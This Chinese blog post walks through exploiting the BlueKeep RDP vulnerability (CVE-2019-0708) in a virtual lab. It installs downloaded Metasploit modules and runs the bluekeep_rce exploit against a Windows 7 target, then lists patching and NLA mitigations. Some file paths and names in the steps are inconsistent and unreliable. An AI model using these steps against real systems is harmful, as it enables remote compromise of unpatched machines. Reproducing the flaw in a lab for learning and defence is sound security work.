• bluekeep漏洞(CVE-2019-0708)利用


    前言

    上个月爆出exp的一个高危漏洞,跟风复现一下下。。。( ̄▽ ̄)~*

    简介

    Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。
     
    影响范围
    注:Windows 8和windows10以及之后的版本不受此漏洞影响
     
    所需条件
    目标机开启3389端口,关闭防火墙(或者在防火墙策略中放行3389端口)
     
    环境
    kali   ip   192.168.10.52
    靶机win7   ip   192.168.10.55(开启了3389端口,关闭了防火墙)
    都是虚拟机,使用桥接模式
     
    1、更新我们的msf
      命令行执行
      apt-get update
      apt-get install metasploit-framework
      我这里更新后虽然有一些报错但还是能够使用
      
    2、下载 exp
      网盘:链接: https://pan.baidu.com/s/1HTk3ehKvZYM0rh4tC0TQLg 提取码: 4dy9
      
      下载后将文件移到kali并将它门放到指定位置
     
      rdp.rb放到/usr/share/metasploit-framework/lib/msf/core/exploit 目录
     
      rdp_scanner.rbcve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
     
      cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
     
     
      命令(一定要把原先的文件覆盖)
      cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
      cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
       cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
       cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
     
    3、更新msf的模块
      先在kali中msfconsole进入metasploit
       在使用reload_all加载复制过去的脚本
       稍等一下即可
     
    4、使用模块
    search 0708      3是我们用到的模块
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  使用模块
     
    这个exp 目前只有 windwos 7  /2008r2  (我这里用的是win7旗舰版64位)
    set RHOSTS 设置IP
    set RPORT 设置RDP端口号
    使用set target ID设置受害机机器
    使用exploit开始攻击,等待建立连接
     
    于是
    set RHOSTS 192.168.10.55填写受害机
     
    set RPORT 3389设置端口(固定)
     
    show targets
    以为我是虚拟机win7所以这里选三
    set target 3
     
    然后就exploit或run开始攻击(第一次win7蓝屏,第二次成功)
     
    搜集的漏洞检测工具
    网盘链接https://pan.baidu.com/s/1ylewLDQPwc4FuxCkm-aQlg    提取码ailu
     
    漏洞修复:
    1. 及时打对应系统的安全补丁
    2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
    3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击
  • 相关阅读:
    类实现接口(Example5_11)
    PyTorch之Checkpoint机制解析
    PyTorch之BN核心参数详解
    PyTorch之分布式操作Barrier
    PyTorch之对类别张量进行onehot编码
    PyTorch之具体显存占用分析
    Pytorch之SpatialShiftOperation的5种实现策略
    无密码远程桌面设置
    人生三个境界
    研华工控机设置上电自启动
  • 原文地址:https://www.cnblogs.com/lceFIre/p/11628773.html
Copyright © 2020-2023  润新知